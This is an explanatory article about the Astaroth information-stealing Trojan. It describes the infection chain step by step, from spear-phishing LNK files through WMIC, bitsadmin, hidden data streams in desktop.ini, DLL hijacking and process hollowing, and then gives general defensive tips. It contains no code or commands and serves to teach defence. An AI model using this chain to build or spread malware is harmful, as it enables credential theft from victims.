Pre-requisite: Malware
In late 2017 the Astaroth Malware was first detected in multiple countries and was mostly used in various cyberattacks. It is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America.
What does Astaroth do?
Astaroth is known as an information stealer. It transfers the confidential information from an affected victim like account id and password, keystrokes, and other data to the attacker.
It is used to infect the memory of computers. It also exploits crucial binaries such as the command line interface of the Windows Management Instrumentation Command line tool to Download and execute malware payloads in the background silently.
How does Astaroth work?
- Initially, the Attacker sends a Spear-phishing email contains a URL to shortcut archive files containing. LNK files in a compressed (ZIP) file with spoof file name.
- When a User clicks on that link. Then it downloads a compressed (ZIP) file silently. This compressed file contains an LNK file that runs the WMIC to install an XSL file.
- The XSL file contains one-line JavaScript that runs using explorer.exe, which in turn fetches the main script and runs it in memory.
- Using bitsadmin.exe the main script downloads encrypted binary content, which it copies to Alternate Data Stream (ADS) of deskop.ini. It deletes the downloaded binary and starts the process again. It repeats this process 11 times.
- The main script also uses bitsadmin.exe to download three more binary data, which it combines to form the first-stage malware code.
- The script calls ExtExport.exe, which loads the first-stage malware code using DLL hijacking technique.
- The first-stage malware decrypts and combines three ADS streams in desktop.ini to form the second-stage malware.
- The second-stage malware in turn reads and decrypts the third-stage malware.
- The third-stage malware is injected into userinit.exe using the process hollowing technique. The injected code reads and decrypts, the final-stage malware code, which is Astaroth.
- Astaroth reads and decrypts various plugins from the ADS streams in desktop.ini. The plugins allow Astaroth to steam email passwords, steal browser passwords, and enumerate installed security software.
How To Protect Yourself from Astaroth?
- Keep software updated: Most attackers will try to find a vulnerability in a system so keeping vulnerabilities patched with software updates can be a critical part of a network in protection against malware.
- Disable unnecessary tools: Giving system admin permissions to all tools even if not in use can leads to a possibility of taking control of system by using malware attacks.so disable the tools that are not in use.
- Implement strict access controls: Try to use multi factor authentications like 2-factor authentication, antivirus, and firewalls and give limited access privileges to the users that they only need.
- Carry out continuous monitoring: Monitoring the programs and scanning continuously for a malicious code and using software to monitor the network to detect any suspicious activity on the network. detect the unknown programs that runs using command line.
- Verify the attachments from unknown sources before opening them: Before opening, any attachments from unknown sources verify the author’s identity and verify the attachments so that we can prevent ourselves from malware attacks.